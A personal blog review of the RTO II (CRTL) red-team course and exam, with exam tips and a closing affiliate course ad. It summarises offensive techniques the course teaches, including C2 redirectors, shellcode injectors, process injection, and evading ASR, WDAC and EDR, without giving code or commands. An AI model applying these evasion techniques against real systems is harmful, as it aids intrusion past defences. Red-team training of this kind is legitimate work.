My Journey with RTO 2 ( CRTL ): A Review

Having successfully passed the RTO I exam in early April 2024, I was driven to further my education in cybersecurity. I began preparing for the CRTO 2, but soon recognized significant gaps in my knowledge. To address this, I delved into malware development and defense evasion techniques while juggling my day job. In October 2024, I invested in the RTO II course and exam. I completed the course and took the exam during the last week of 2024, clearing all 6 machine at 4 am on December 31st. In this blog, I’ll share my insights and experiences with the course, offering an opinion on whether it’s worth considering for others interested in advancing their cybersecurity skills.

Course Overview

The RTO 2 course serves as an extension of RTO I, deepening the foundational knowledge already acquired. While not strictly required, completing RTO I first is strongly advised. RTO II concentrates on advanced operational security (OPSEC) tactics adversary simulation, emphasizing defense evasion and bypassing hardened systems. Designed for red teamers aiming to refine their skills, the course dives deep into Cobalt Strike, infrastructure setup, and custom payload development.

It begins with advanced infrastructure setup, including building redirectors from scratch to hide the C2 servers. Also it discuss on the guard-lines that can be implemented to prevent from detonation payloads in wrong environment.

Having basic knowledge of programming is highly use full as the course cover a section on windows API and leveraging them to build a shell code injector. The Course provides example code and discuss on the use cases which is very insightful.

Later the course also discuss on other techniques such as process injection , remote process injection , command line spoofing etc..

The course dives into Windows defenses like Attack Surface Reduction (ASR) and Windows Defender Application Control (WDAC), breaking down their pros, cons, and how to sidestep them.

The last bit on EDR evasion was gold , it’s all about outsmarting modern EDR’s. Testing our payloads against EDR driver, getting into the nitty-gritty of evasion tactics, from syscalls to ArtifactKit hacks. Sure, some old tricks are getting caught by signatures now, but understanding the core of EDR systems and how they tick is key for anyone building payloads.

Exam

The exam provides ample time, offering 96 hours of runtime within an 8-day window, and requires securing at least 5 out of 6 flags to pass. With sufficient lab practice and completing all the preparation steps, success is well within reach!

Tips

  • Setup one re-director , i recommend HTTP and dont spend much time on getting it on HTTPS.
  • Have a working custom loader , C2 profile would be helpful. ( recommend going through cobalt-strike docs )
  • The tools provided on the attacker machine can offer clues about the attack path for compromising the domain.
  • Highly recommend going through RTO I once before attempting exam.
  • Although it’s advised to minimize the use of fork & run or remote injection during post-exploitation, these techniques can still be utilized during the exam if necessary.
  • Be ready to research when you get stuck.

Conclusion

I had an absolute blast with the course and exam! It was a rollercoaster of ups and downs, but every twist and turn made the journey exciting and rewarding. If you’re aspiring to dive into the world of Red Teaming, I can’t recommend RTO I and RTO II enough , they’re total game-changers. Hopefully, this post helps anyone teetering on the edge of enrolling to take the leap. Trust me, it’s worth it!

Please feel free to reachout to me on LinkedIn if you have any questions!

My Journey with RTO 2 ( CRTL ): A Review was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Introduction to Malware Binary Triage (IMBT) Course

Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.

Article Link: My Journey with RTO 2 ( CRTL ): A Review | by JustAnother-Engineer | Jan, 2025 | Medium